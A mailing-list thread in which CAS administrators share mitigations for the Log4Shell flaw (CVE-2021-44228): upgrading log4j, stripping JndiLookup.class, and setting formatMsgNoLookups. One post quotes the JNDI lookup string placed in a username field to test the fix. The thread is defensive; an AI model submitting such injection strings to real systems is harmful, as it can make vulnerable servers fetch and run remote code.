log4j vulnerability

734 views
Skip to first unread message

King, Robert

unread,
Dec 10, 2021, 1:36:27 PM12/10/21
to cas-...@apereo.org

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

 

Has anyone attempted to mitigate this CVE yet?

 

There seems to be two possible approaches to mitigation:

 

1 The sledgehammer approach of removing the JndiLookup.class from the jar files:

 

zip –q –d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

 

2. Rebuild CAS and set “log4jVersion=2.15.0”

Richard Frovarp

unread,
Dec 10, 2021, 1:41:36 PM12/10/21
to cas-...@apereo.org
Using a new enough version of the JDK might also alleviate it? The other option is to throw the config option at the JDK to stop it from happening. That would seem to be easiest.
--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
---
You received this message because you are subscribed to the Google Groups "CAS Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email to cas-user+u...@apereo.org.
To view this discussion on the web visit https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca.


Mike Osterman

unread,
Dec 10, 2021, 1:56:00 PM12/10/21
to CAS Community
Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in the log4j2.xml config file might do to trick.

I'm guessing we'd do that somewhere here at the top?

<?xml version="1.0" encoding="UTF-8" ?>
<!-- Specify the refresh internal in seconds. -->
<Configuration monitorInterval="5" packages="org.apereo.cas.logging">
    <Properties>
        <Property name="baseDir">/etc/cas/logs</Property>
    </Properties>
    <Appenders>

Richard Frovarp

unread,
Dec 10, 2021, 1:59:00 PM12/10/21
to cas-...@apereo.org
Maybe? The one that I've seen

says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to your JVM and not in the config file.

Adam Franco

unread,
Dec 10, 2021, 2:34:24 PM12/10/21
to CAS Community, richard.frovarp
I've rebuilt CAS with log4j 2.15.0 and confirmed that doing so stopped outgoing connections when a line like
${jndi:rmi://www.example.com:80/test}
was submitted in the username field (I used a real hostname rather than www.example.com).

We were able to verify this fix with tcpdump on the CAS node as well as border-firewall logging.

King, Robert

unread,
Dec 10, 2021, 3:01:49 PM12/10/21
to cas-...@apereo.org

Just rolled out this mitigation to our servers, seems to be effective for CAS 6.3.x builds.

 

Our environment for reference:

 

- Standalone Tomcat

- OpenJDK

- CAS and CAS-Management as deployed jars

- CAS and CAS-Mangement built from cas-overlay and cas-management-overlay repos.

 

Mitigated by adding “-Dlog4j2.FormatMsgNoLookups=true” into the Tomcat startup in systemd tomcat.service file.

Anders Collstrup

unread,
Dec 11, 2021, 7:45:26 AM12/11/21
to cas-...@apereo.org
My fix was the following:

CAS 6.1 running on debian 10. All except CAS installed from standard repo's

created this file:
/usr/share/tomcat9/bin/setenv.sh

containing::
JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=True"

After restart of tomcat I could see the following in the log:
10-Dec-2021 18:49:18.681 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dlog4j2.formatMsgNoLookups=True

Reply all
Reply to author
Forward
0 new messages